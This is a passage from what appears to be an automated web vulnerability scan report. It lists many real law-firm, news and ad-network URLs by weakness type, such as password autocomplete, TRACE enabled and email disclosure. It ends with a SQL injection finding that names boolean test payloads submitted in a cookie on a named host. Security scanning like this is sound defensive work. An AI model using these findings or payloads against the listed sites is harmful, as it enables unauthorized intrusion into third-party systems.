18.102. http://www.gartner.com/css/win/main.css

18.103. http://www.gartner.com/css/win/navigation.css

18.104. http://www.gartner.com/images/homepage/gartner80.gif

18.105. http://www.gartner.com/images/popup_logo_071201.gif

18.106. http://www.gartner.com/images/trans_pixel.gif

18.107. http://www.gartner.com/include/webtrends.jsp

18.108. http://www.gartner.com/it/css/g1_header_footer.css

18.109. http://www.gartner.com/it/images/homepage/gartner136.gif

18.110. http://www.gartner.com/it/include/g1_footer.js

18.111. http://www.gartner.com/js/cookie.js

18.112. http://www.gartner.com/js/layerapi.js

18.113. http://www.gartner.com/js/menu.js

18.114. http://www.gartner.com/js/mouseevents.js

18.115. http://www.gartner.com/js/navigation.js

18.116. http://www.gartner.com/js/optionsArray.jsp

18.117. http://www.gartner.com/js/regionalsText.js

18.118. http://www.gartner.com/js/unica/ntpagetag.js

18.119. http://www.gartner.com/js/utility.js

18.120. http://www.gartner.com/js/webtrendsCookies.js

18.121. http://www.gartner.com/pages/docs/gartner/mq/scripts/utils.js

18.122. https://www.gartner.com/login/loginInitAction.do

18.123. http://www.google.com/finance

18.124. https://www.google.com/accounts/ServiceLogin

18.125. http://www.hartfordbusiness.com/phpAds/adjs.php

18.126. http://www.hartfordbusiness.com/phpAds/www/delivery/lg.php

18.127. http://www.howardrice.com/

18.128. http://www.howardrice.com/6862

18.129. http://www.howardrice.com/Alumni

18.130. http://www.howardrice.com/Events

18.131. http://www.howardrice.com/WebResource.axd

18.132. http://www.howardrice.com/showlandingpage.aspx

18.133. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx

18.134. http://www.moritthock.com/

18.135. http://www.moritthock.com/index.php

18.136. http://www.moritthock.com/index.php/attorneys

18.137. http://www.moritthock.com/index.php/attorneys/attorney/terese_l_arenth

18.138. http://www.moritthock.com/index.php/news_events/announcement/joshua_b._summers_elected_to_board_of_directors_of_the_jcc_of_the_greater_f

18.139. http://www.moritthock.com/index.php/news_events/press_releases

18.140. http://www.moritthock.com/index.php/news_events/television_media

18.141. http://www.moritthock.com/index.php/practice_areas

18.142. http://www.nytimes.com/2007/02/09/business/09legal.html

18.143. http://www.nytimes.com/2009/01/13/business/13bail.html

18.144. http://www.nytimes.com/2009/06/19/business/19scrushy.html

18.145. http://www.nytimes.com/2010/08/22/sports/cycling/22armstrong.html

18.146. http://www.orangecountyala.org/clubportal/memlogin.cfm

18.147. http://www.perkinscoie.com/

18.148. http://www.perkinscoie.com/AdvancedSearch.aspx

18.149. http://www.perkinscoie.com/FCWSite/abc.aspx

18.150. http://www.perkinscoie.com/events/eventslist.aspx

18.151. http://www.perkinscoie.com/firm/firm.aspx

18.152. http://www.perkinscoie.com/mquehrn/

18.153. http://www.perkinscoie.com/news/news_detail.aspx

18.154. http://www.perkinscoie.com/professionals/professionals.aspx

18.155. http://www.perkinscoie.com/professionals/professionals_detail.aspx

18.156. http://www.perkinscoie.com/professionals/professionals_results.aspx

18.157. http://www.perkinscoie.com/professionals/professionals_vcard.aspx

18.158. http://www.porterwright.com/

18.159. http://www.porterwright.com/404.aspx

18.160. http://www.porterwright.com/FCWSite/Include/spamproof.aspx

18.161. http://www.porterwright.com/aboutus/xpqGC.aspx

18.162. http://www.porterwright.com/careers/

18.163. http://www.porterwright.com/careers/xpqGC.aspx

18.164. http://www.porterwright.com/contactus/

18.165. http://www.porterwright.com/emailthispage/emdisclaimer.aspx

18.166. http://www.porterwright.com/favicon.ico

18.167. http://www.porterwright.com/government--regulatory-affairs-practice-areas/

18.168. http://www.porterwright.com/news/xpqNewsDetail.aspx

18.169. http://www.porterwright.com/people/

18.170. http://www.porterwright.com/professionals/xpqProfResults.aspx

18.171. http://www.porterwright.com/search/xpqSiteSearch.aspx

18.172. http://www.porterwright.com/services/

18.173. http://www.porterwright.com/services/xpqServiceDetail.aspx

18.174. http://www.porterwright.com/services/xpqServiceListPW.aspx

18.175. http://www.porterwright.com/styleBuilder.aspx

18.176. http://www.wendel.com/index.cfm

18.177. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm

18.178. http://www.wi-ala.org/clubportal/loginretrieval.cfm

18.179. http://www.wi-ala.org/clubportal/memLogin.cfm

18.180. http://www.wi-ala.org/clubportal/memLoginExe.cfm

18.181. http://www.wi-ala.org/clubportal/wala/Page.cfm

19. Password field with autocomplete enabled

19.1. https://client.poynerspruill.com/Pages/Home.aspx

19.2. https://client.poynerspruill.com/pages/changepassword.aspx

19.3. http://www.boston.com/business/globe/articles/2006/07/22/convention_center_gets_24m_settlement/

19.4. https://www.gartner.com/login/loginInitAction.do

19.5. https://www.google.com/accounts/ServiceLogin

19.6. http://www.hartfordbusiness.com/news14300.html

19.7. http://www.hartfordbusiness.com/news14300.html

19.8. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx

19.9. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx

19.10. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx

19.11. http://www.orangecountyala.org/clubportal/memlogin.cfm

19.12. http://www.pillsburylaw.com/

19.13. http://www.pillsburylaw.com/index.cfm

19.14. http://www.pillsburylaw.com/index.cfm

19.15. http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP

19.16. http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP

19.17. http://www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver

19.18. http://www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver

19.19. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP

19.20. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP

19.21. http://www.wi-ala.org/ClubPortal/wala/

19.22. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm

19.23. http://www.wi-ala.org/clubportal/memLogin.cfm

19.24. http://www.wi-ala.org/clubportal/wala/Page.cfm

20. Source code disclosure

20.1. http://graphics8.nytimes.com/js/app/article/articleCommentCount.js

20.2. http://graphics8.nytimes.com/js2/lib/facebook/article/1.0/build.min.js

21. ASP.NET debugging enabled

21.1. http://www.ctlawtribune.com/Default.aspx

21.2. http://www.howardrice.com/Default.aspx

21.3. http://www.iimagazine.com/Default.aspx

22. Referer-dependent response

22.1. http://centrifugesystems.app101.hubspot.com/Inactive.aspx

22.2. http://www.hartfordbusiness.com/phpAds/adjs.php

22.3. http://www.sheehan.com/

22.4. http://www.wi-ala.org/clubportal/loginretrieval.cfm

23. Cross-domain POST

23.1. http://baxterhall.com/

23.2. http://www.rtacpa.com/

24. Cross-domain Referer leakage

24.1. http://ad.doubleclick.net/adi/N3905.372584.HARTFORDBUSINESS.CO/B5470639.2

24.2. http://ad.doubleclick.net/adi/N3905.372584.HARTFORDBUSINESS.CO/B5470639.3

24.3. http://gigablast.com/

24.4. http://googleads.g.doubleclick.net/pagead/ads

24.5. http://layserfreiwald.com/attorneys.html

24.6. http://layserfreiwald.com/attorneys.html

24.7. http://www.bing.com/search

24.8. http://www.gartner.com/0_admin/PasswordRequest.jsp

24.9. http://www.gartner.com/technology/cio-priorities/ipad-business.jsp

24.10. http://www.gigablast.com/

24.11. http://www.google.com/search

24.12. http://www.google.com/search

24.13. http://www.google.com/search

24.14. http://www.google.com/search

24.15. http://www.google.com/search

24.16. http://www.google.com/search

24.17. http://www.google.com/search

24.18. http://www.google.com/search

24.19. http://www.google.com/search

24.20. http://www.google.com/search

24.21. http://www.google.com/search

24.22. http://www.google.com/search

24.23. http://www.google.com/search

24.24. http://www.google.com/search

24.25. http://www.google.com/search

24.26. http://www.google.com/search

24.27. http://www.google.com/search

24.28. http://www.google.com/search

24.29. http://www.google.com/search

24.30. http://www.google.com/search

24.31. http://www.google.com/search

24.32. http://www.google.com/search

24.33. http://www.ngelaw.com/news/event_detail.aspx

24.34. http://www.orangecountyala.org/clubportal/memlogin.cfm

24.35. http://www.perkinscoie.com/events/eventslist.aspx

24.36. http://www.perkinscoie.com/professionals/professionals_results.aspx

24.37. http://www.pomerantzlaw.com/cases.html

24.38. http://www.pomerantzlaw.com/practice-areas.html

24.39. http://www.stumbleupon.com/badge/embed/1/

24.40. http://www.tydingslaw.com/Content.aspx

24.41. http://www.wendel.com/index.cfm

24.42. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm

24.43. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm

24.44. http://www.wi-ala.org/clubportal/loginretrieval.cfm

24.45. http://www.wi-ala.org/clubportal/memLogin.cfm

24.46. http://www.wi-ala.org/clubportal/wala/Page.cfm

24.47. http://www.wiggin.com/showarea.aspx

25. Cross-domain script include

25.1. http://baxterhall.com/

25.2. http://googleads.g.doubleclick.net/pagead/ads

25.3. http://layserfreiwald.com/

25.4. http://layserfreiwald.com/attorneys.html

25.5. http://layserfreiwald.com/practice_areas/insurance_coverage_and_bad_faith.html

25.6. http://m.perkinscoie.com/

25.7. http://m.perkinscoie.com/practices/

25.8. http://m.perkinscoie.com/publications/

25.9. http://www.bloomberg.com/apps/news

25.10. http://www.boston.com/business/globe/articles/2006/07/22/convention_center_gets_24m_settlement/

25.11. http://www.centrifugesystems.com/

25.12. http://www.centrifugesystems.com/images/01_Home/ad_02/bg_Left.png

25.13. http://www.centrifugesystems.com/images/01_Home/ad_02/bg_Top.png

25.14. http://www.dmoc.com/contact

25.15. http://www.dmoc.com/practice

25.16. http://www.elawmarketing.com/about/clients

25.17. http://www.elawmarketing.com/about/staff

25.18. http://www.elawmarketing.com/portfolio

25.19. http://www.elawmarketing.com/portfolio/websites

25.20. http://www.elawmarketing.com/portfolio/websites/diserio-martin-oconnor-castiglioni-llp

25.21. http://www.elawmarketing.com/portfolio/websites/layser-freiwald

25.22. http://www.elawmarketing.com/portfolio/websites/los-angeles-chapter-association-legal-administrators

25.23. http://www.elawmarketing.com/portfolio/websites/orange-county-chapter-association-legal-administrators

25.24. http://www.elawmarketing.com/portfolio/websites/pomerantz-haudek-grossman-gross-llp

25.25. http://www.elawmarketing.com/portfolio/websites/rothman-consulting

25.26. http://www.elawmarketing.com/portfolio/websites/wisconsin-chapter-association-legal-administrators

25.27. http://www.fundingpost.com/breakfast/reg1.asp

25.28. http://www.gartner.com/technology/cio-priorities/ipad-business.jsp

25.29. http://www.gartner.com/technology/vendor-insights/procurement-sourcing-technology.jsp

25.30. http://www.glaala.org/clubportal/glaala/index.cfm

25.31. http://www.hartfordbusiness.com/news14300.html

25.32. http://www.howardrice.com/

25.33. http://www.howardrice.com/6862

25.34. http://www.howardrice.com/Alumni

25.35. http://www.howardrice.com/Events

25.36. http://www.letipli.com/member_details.asp

25.37. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx

25.38. http://www.memberize.com/

25.39. http://www.njbiz.com/article.asp

25.40. http://www.nldhlaw.com/

25.41. http://www.nldhlaw.com/PracticeAreas/Employment-Law.asp

25.42. http://www.nldhlaw.com/PracticeAreas/Institutional-Litigation-and-Consulting.asp

25.43. http://www.nytimes.com/2007/02/09/business/09legal.html

25.44. http://www.nytimes.com/2009/01/13/business/13bail.html

25.45. http://www.nytimes.com/2009/06/19/business/19scrushy.html

25.46. http://www.nytimes.com/2010/08/22/sports/cycling/22armstrong.html

25.47. http://www.ober.com/news_events/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligible

25.48. http://www.orangecountyala.org/clubportal/memlogin.cfm

25.49. http://www.orangecountyala.org/clubportal/ocala/

25.50. http://www.perkinscoie.com/

25.51. http://www.perkinscoie.com/AdvancedSearch.aspx

25.52. http://www.perkinscoie.com/events/eventslist.aspx

25.53. http://www.perkinscoie.com/firm/firm.aspx

25.54. http://www.perkinscoie.com/mquehrn/

25.55. http://www.perkinscoie.com/news/news_detail.aspx

25.56. http://www.perkinscoie.com/professionals/professionals.aspx

25.57. http://www.perkinscoie.com/professionals/professionals_results.aspx

25.58. http://www.pomerantzlaw.com/cases.html

25.59. http://www.pomerantzlaw.com/contact-us.html

25.60. http://www.pomerantzlaw.com/institutional-investor-services/litigation-services-for-investors.html

25.61. http://www.pomerantzlaw.com/practice-areas.html

25.62. http://www.pomerantzlaw.com/the-firm/what-makes-pomerantz-unique.html

25.63. http://www.powelltrachtman.com/

25.64. http://www.powelltrachtman.com/CM/Custom/Case-Studies.asp

25.65. http://www.powelltrachtman.com/PracticeAreas/Employment-Claims-Labor-Relations.asp

25.66. http://www.poynerspruill.com/newsandevents/Pages/SignUpForAlerts.aspx

25.67. http://www.semmes.com/attorney_search.asp

25.68. http://www.semmes.com/contact/associate.asp

25.69. http://www.semmes.com/contact/default.asp

25.70. http://www.semmes.com/contactus.asp

25.71. http://www.semmes.com/offices/salisbury.asp

25.72. http://www.semmes.com/offices/virginia.asp

25.73. http://www.sleepertechnologies.com/

25.74. http://www.stumbleupon.com/badge/embed/1/

25.75. http://www.superlawyers.com/pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html

25.76. http://www.tydingslaw.com/

25.77. http://www.tydingslaw.com/ArticlesPublications.aspx

25.78. http://www.tydingslaw.com/Content.aspx

25.79. http://www.tydingslaw.com/OurAttorneys.aspx

25.80. http://www.tydingslaw.com/PracticesIndustries.aspx

25.81. http://www.tydingslaw.com/PracticesIndustries/Attorneys.aspx

25.82. http://www.tydingslaw.com/PracticesIndustries/pid/7/Commercial-and-Business-Litigation-.aspx

25.83. http://www.tydingslaw.com/SearchResults.aspx

25.84. http://www.usatoday.com/money/autos/2009-04-20-gm-dealers-bankruptcy_N.htm

25.85. http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP

25.86. http://www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver

25.87. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP

25.88. http://www.washingtonpost.com/wp-dyn/content/article/2009/06/17/AR2009061701900.html

25.89. http://www.wi-ala.org/ClubPortal/wala/

25.90. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm

25.91. http://www.wi-ala.org/clubportal/loginretrieval.cfm

25.92. http://www.wi-ala.org/clubportal/memLogin.cfm

25.93. http://www.wi-ala.org/clubportal/wala/Page.cfm

26. TRACE method is enabled

26.1. http://ads.keypromedia.com/

26.2. http://attorney.findlaw.com/

26.3. http://c.statcounter.com/

26.4. http://capgroup.112.2o7.net/

26.5. http://d1.openx.org/

26.6. http://elawmarketing.com/

26.7. http://r.openx.net/

26.8. http://tracking.hubspot.com/

26.9. http://www.bisnow.com/

26.10. http://www.centrifugesystems.com/

26.11. http://www.dmoc.com/

26.12. http://www.elawmarketing.com/

26.13. http://www.forbes.com/

26.14. http://www.letipli.com/

26.15. http://www.milbanktweed.org/

26.16. http://www.nealgerber.com/

26.17. http://www.ngelaw.com/

26.18. http://www.njsba.com/

26.19. http://www.npr.org/

26.20. http://www.ober.com/

26.21. http://www.peckshaffer.com/

26.22. http://www.semmes.com/

26.23. http://www.sleepertechnologies.com/

26.24. http://www.stumbleupon.com/

26.25. http://www.superlawyers.com/

26.26. http://www.weblinedesigns.com/

27. Email addresses disclosed

27.1. http://baxterhall.com/

27.2. https://citrix.howardrice.com/Citrix/AccessPlatform/auth/login.aspx

27.3. https://client.poynerspruill.com/Pages/Home.aspx

27.4. http://imagesrv.gartner.com/media/jwplayer/flowplayer.ipad-3.2.1.js

27.5. http://layserfreiwald.com/

27.6. http://layserfreiwald.com/attorneys.html

27.7. http://layserfreiwald.com/attorneys.html

27.8. http://layserfreiwald.com/practice_areas/insurance_coverage_and_bad_faith.html

27.9. https://mail.howardrice.com/exchweb/bin/auth/owalogon.asp

27.10. http://www.capgroup.com/_js/s_code.js

27.11. http://www.forbes.com/feeds/ap/2009/05/26/ap6466854.html

27.12. http://www.fundingpost.com/breakfast/reg1.asp

27.13. http://www.glaala.org/clubportal/glaala/index.cfm

27.14. http://www.glaala.org/clubportal/js/date-picker.js

27.15. http://www.google.com/search

27.16. https://www.google.com/accounts/ServiceLogin

27.17. http://www.hartfordbusiness.com/fs_webkit/fs_toolbox.js

27.18. http://www.hartfordbusiness.com/fs_webkit/jquery/dimensions_1.1.2.js

27.19. http://www.hartfordbusiness.com/news14300.html

27.20. http://www.lawseminars.com/detail.php

27.21. http://www.mccarter.com/new/contactnew.aspx

27.22. http://www.mccarter.com/new/homenew.aspx

27.23. http://www.mccarter.com/new/privacynew.aspx

27.24. http://www.mccarter.com/new/showcareerpagenew.aspx

27.25. http://www.mccarter.com/new/showeventnew.aspx

27.26. http://www.milbank.com/en/Alumni/

27.27. http://www.milbank.com/en/NewsEvents/RecentPressRel/Milbank_Represents_Lenders_in_Financing_of_Two_40_MW_Hydropower_Plants_in_Chile.htm

27.28. http://www.moritthock.com/

27.29. http://www.moritthock.com/index.php

27.30. http://www.moritthock.com/index.php/attorneys

27.31. http://www.moritthock.com/index.php/attorneys/attorney/terese_l_arenth

27.32. http://www.ngelaw.com/attorney/bio.aspx

27.33. http://www.ngelaw.com/attorney/results.aspx

27.34. http://www.ngelaw.com/news/event_detail.aspx

27.35. http://www.ngelaw.com/news/events.aspx

27.36. http://www.ober.com/news_events/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligible

27.37. http://www.ober.com/practices/32

27.38. http://www.ober.com/practices/55

27.39. http://www.ober.com/practices/intellectual-property

27.40. http://www.orangecountyala.org/clubportal/js/date-picker.js

27.41. http://www.peckshaffer.com/contact.php

27.42. http://www.perkinscoie.com/fcwsite/include/flowplayer/flowplayer.playlist-3.0.1.min.js

27.43. http://www.pillsburylaw.com/index.cfm

27.44. http://www.pomerantzlaw.com/cases.html

27.45. http://www.pomerantzlaw.com/contact-us.html

27.46. http://www.porterwright.com/careers/

27.47. http://www.powelltrachtman.com/Includes/clientcode/browserdetect.js

27.48. http://www.poynerspruill.com/newsandevents/Pages/Creditors%27Committees.aspx

27.49. http://www.poynerspruill.com/newsandevents/Pages/SignUpForAlerts.aspx

27.50. http://www.rtacpa.com/

27.51. http://www.semmes.com/contact/default.asp

27.52. http://www.semmes.com/contactus.asp

27.53. http://www.sheehan.com/news/articles/Dastin-Honored-with-David-P.-Goodwin-NeighborWorks--Outstanding-Neighbor-Award_497.aspx

27.54. http://www.sheehan.com/people/attorneys/Katherine-M.-Hanna.aspx

27.55. http://www.sleepertechnologies.com/

27.56. http://www.smithmazure.com/

27.57. http://www.smithmazure.com/attorney.asp

27.58. http://www.smithmazure.com/indus-manu.htm

27.59. http://www.smithmazure.com/news.asp

27.60. http://www.smithmazure.com/newsletters.asp

27.61. http://www.smithmazure.com/practice.asp

27.62. http://www.smithmazure.com/resources.asp

27.63. http://www.sutphinblvdbid.org/

27.64. http://www.tydingslaw.com/OurAttorneys.aspx

27.65. http://www.tydingslaw.com/PracticesIndustries/Attorneys.aspx

27.66. http://www.tydingslaw.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js

27.67. http://www.tydingslaw.com/Resources/Shared/scripts/widgets.js

27.68. http://www.usatoday.com/money/autos/2009-04-20-gm-dealers-bankruptcy_N.htm

27.69. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm

27.70. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm

27.71. http://www.wi-ala.org/clubportal/js/date-picker.js

27.72. http://www.wi-ala.org/clubportal/loginretrieval.cfm

27.73. http://www.wi-ala.org/clubportal/wala/Page.cfm

27.74. http://www.wiggin.com/alumni.aspx

27.75. http://www.wiggin.com/bios.aspx

27.76. http://www.wiggin.com/showarea.aspx

28. Private IP addresses disclosed

29. Social security numbers disclosed

30. Credit card numbers disclosed

31. Robots.txt file

31.1. http://158-vdp-616.mktoresp.com/webevents/visitWebPage

31.2. http://ad.doubleclick.net/ad/N3282.nytimes.comSD6440/B3948326.5

31.3. http://ads.keypromedia.com/www/delivery/ajs.php

31.4. http://api.recaptcha.net/challenge

31.5. http://attorney.findlaw.com/b/ss/findlaw-12282,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s35924329407941

31.6. http://b.scorecardresearch.com/b

31.7. http://c.statcounter.com/t.php

31.8. http://capgroup.112.2o7.net/b/ss/capgroupprod/1/H.15.1/s41646418426182

31.9. http://cspix.media6degrees.com/orbserv/hbpix

31.10. http://d1.openx.org/spcjs.php

31.11. http://ehg-findlaw.hitbox.com/HG

31.12. http://feeds.bbci.co.uk/news/rss.xml

31.13. http://gigablast.com/

31.14. http://googleads.g.doubleclick.net/pagead/ads

31.15. http://image.exct.net/aec5805b-4.jpg

31.16. http://imagesrv.gartner.com/css/TabbedPanels.css

31.17. http://l.addthiscdn.com/live/t00/250lo.gif

31.18. http://m.perkinscoie.com/

31.19. http://maps.google.com/maps

31.20. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur

31.21. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

31.22. http://s7.addthis.com/js/250/addthis_widget.js

31.23. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEY1YgDIOiIAyoHWcQAAP__ADIFVcQAAA8

31.24. http://safebrowsing.clients.google.com/safebrowsing/downloads

31.25. http://t2.gstatic.com/images

31.26. http://wtssdc.gartner.com/dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif

31.27. http://www.bisnow.com/new_york_commercial_real_estate_news_story.php

31.28. http://www.bloomberg.com/apps/news

31.29. http://www.boston.com/business/globe/articles/2006/07/22/convention_center_gets_24m_settlement/

31.30. http://www.capgroup.com/

31.31. http://www.centrifugesystems.com/

31.32. http://www.chambersandpartners.com/europe/rankings36.aspx

31.33. http://www.cnbc.com/id/15840232

31.34. http://www.dmoc.com/

31.35. http://www.elawmarketing.com/about/staff

31.36. http://www.elfaonline.org/pub/news/indnews/news_report.cfm

31.37. http://www.forbes.com/feeds/ap/2009/05/26/ap6466854.html

31.38. http://www.freep.com/apps/pbcs.dll/article

31.39. http://www.ft.com/cms/s/0/fd2e0fcc-4a55-11de-8e7e-00144feabdc0.html

31.40. http://www.gartner.com/technology/home.jsp

31.41. https://www.gartner.com/login/loginInitAction.do

31.42. http://www.gigablast.com/

31.43. http://www.glaala.org/clubportal/glaala/index.cfm

31.44. http://www.goclubexe.com/clubportal

31.45. http://www.google-analytics.com/__utm.gif

31.46. http://www.google.com/search

31.47. https://www.google.com/accounts/ServiceLogin

31.48. http://www.hartfordbusiness.com/news14300.html

31.49. http://www.howardrice.com/

31.50. http://www.jdtplaw.com/

31.51. http://www.law.com/jsp/article.jsp

31.52. http://www.letipli.com/member_details.asp

31.53. http://www.linkedin.com/companies/peck-shaffer-&-williams

31.54. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx

31.55. http://www.memberize.com/

31.56. http://www.microsoft.com/ContentRedirect.asp

31.57. http://www.milbank.com/en

31.58. http://www.milbanktweed.org/GENERAL/Extranet.nsf/ClientLogin

31.59. http://www.njbiz.com/article.asp

31.60. http://www.nldhlaw.com/

31.61. http://www.npr.org/templates/story/story.php

31.62. http://www.nytimes.com/reuters/2009/11/30/arts/entertainment-us-golf-woods.html

31.63. http://www.orangecountyala.org/clubportal/ocala/

31.64. http://www.perkinscoie.com/

31.65. http://www.pillsburylaw.com/

31.66. https://www.pillsburylaw.com/index.cfm

31.67. http://www.porterwright.com/

31.68. http://www.powelltrachtman.com/

31.69. http://www.semmes.com/attorney_search.asp

31.70. http://www.sleepertechnologies.com/

31.71. http://www.stumbleupon.com/hostedbadge.php

31.72. http://www.superlawyers.com/redir

31.73. http://www.usatoday.com/money/autos/2009-04-20-gm-dealers-bankruptcy_N.htm

31.74. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP

31.75. http://www.washingtonpost.com/wp-dyn/content/article/2009/06/17/AR2009061701900.html

31.76. http://www.weblinedesigns.com/

31.77. http://www.wi-ala.org/ClubPortal/wala/

32. Cacheable HTTPS response

32.1. https://citrix.howardrice.com/Citrix/AccessPlatform/

32.2. https://client.poynerspruill.com/Pages/Home.aspx

32.3. https://client.poynerspruill.com/pages/changepassword.aspx

32.4. https://client.poynerspruill.com/pages/forgotpassword.aspx

32.5. https://www.gartner.com/favicon.ico

32.6. https://www.gartner.com/login/loginInitAction.do

33. Multiple content types specified

34. HTML does not specify charset

34.1. http://ad.doubleclick.net/adi/N3905.372584.HARTFORDBUSINESS.CO/B5470639.2

34.2. http://ad.doubleclick.net/adi/N3905.372584.HARTFORDBUSINESS.CO/B5470639.3

34.3. http://citrix.howardrice.com/

34.4. http://gigablast.com/addurl

34.5. http://gigablast.com/favicon.ico

34.6. http://gigablast.com/gsa.html

34.7. http://gigablast.com/prcts.html

34.8. http://gigablast.com/prdir.html

34.9. http://gigablast.com/search

34.10. http://timespeople.nytimes.com/packages/html/timespeople/xmlhttprequest.html

34.11. http://www.forbes.com/feeds/ap/2009/05/26/ap6466854.html

34.12. http://www.gigablast.com/addurl

34.13. http://www.gigablast.com/search

34.14. http://www.google.com/recaptcha/api/image

34.15. http://www.jdtplaw.com/favicon.ico

34.16. http://www.mccarter.com/

34.17. http://www.moritthock.com/index.php

34.18. http://www.nldhlaw.com/favicon.ico

34.19. http://www.nytimes.com/adx/bin/adx_remote.html

34.20. http://www.nytimes.com/adx/bin/clientside/6d2cd6a9Q2FQ2AQ3CTxJQ22Q2F8qBs8xToxs8YQ2BYxhsBIQ2B

34.21. http://www.nytimes.com/facebook

34.22. http://www.nytimes.com/svc/timespeople/bell.html

34.23. http://www.powelltrachtman.com/favicon.ico

34.24. http://www.rothmanconsulting.com/favicon.ico

34.25. http://www.usatoday.com/money/autos/2009-04-20-gm-dealers-bankruptcy_N.htm

35. HTML uses unrecognised charset

35.1. http://gigablast.com/

35.2. http://www.gartner.com/0_admin/PasswordRequest.jsp

35.3. http://www.gartner.com/0_admin/TechnicalSupportPhone.jsp

35.4. http://www.gartner.com/include/webtrends.jsp

35.5. http://www.gigablast.com/

35.6. http://www.hartfordbusiness.com/news14300.html

36. Content type incorrectly stated

36.1. http://centrifugesystems.app101.hubspot.com/salog.js.aspx

36.2. http://gigablast.com/favicon.ico

36.3. http://image.exct.net/3aa0b01a-9.jpg

36.4. http://image.exct.net/66630590-4.jpg

36.5. http://image.exct.net/aec5805b-4.jpg

36.6. http://js.nyt.com/js/app/moth/moth.js

36.7. http://m.perkinscoie.com/FCWSite/img/mobile/read_more.png

36.8. http://m.perkinscoie.com/FCWSite/img/mobile/read_more_hover.png

36.9. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur

36.10. http://pillsburylaw.app4.hubspot.com/salog.js.aspx

36.11. http://www.dmoc.com/favicon.ico

36.12. http://www.gartner.com/favicon.ico

36.13. http://www.gartner.com/include/webtrends.jsp

36.14. http://www.gartner.com/technology/include/metricsHelper.jsp

36.15. https://www.gartner.com/favicon.ico

36.16. http://www.glaala.org/clubportal/images/clubimages/194/vendors/wolfe_busby_logo.tiff

36.17. http://www.moritthock.com/index.php

36.18. http://www.nytimes.com/adx/bin/adx_remote.html

36.19. http://www.nytimes.com/adx/bin/clientside/6d2cd6a9Q2FQ2AQ3CTxJQ22Q2F8qBs8xToxs8YQ2BYxhsBIQ2B

36.20. http://www.nytimes.com/facebook

36.21. http://www.nytimes.com/svc/timespeople/bell.html

36.22. http://www.porterwright.com/files/ImageControl/df2c4f38-f32b-4661-95a3-f93deff66e3b/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/SitemapImage.jpg

36.23. http://www.stumbleupon.com/hostedbadge.php

36.24. http://www.wiggin.com/images/nav_recruiting.gif

37. Content type is not specified

37.1. https://client.poynerspruill.com/favicon.ico

37.2. http://gigablast.com/scripts/rollovers.js

37.3. http://labs.natpal.com/trk/lead

37.4. http://labs.natpal.com/trk/pixel

37.5. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx


1. SQL injection  next
There are 106 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

1.1. http://ds.addthis.com/red/psi/sites/www.tydingslaw.com/p.json [dt cookie]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.tydingslaw.com/p.json

Issue detail

The dt cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the dt cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

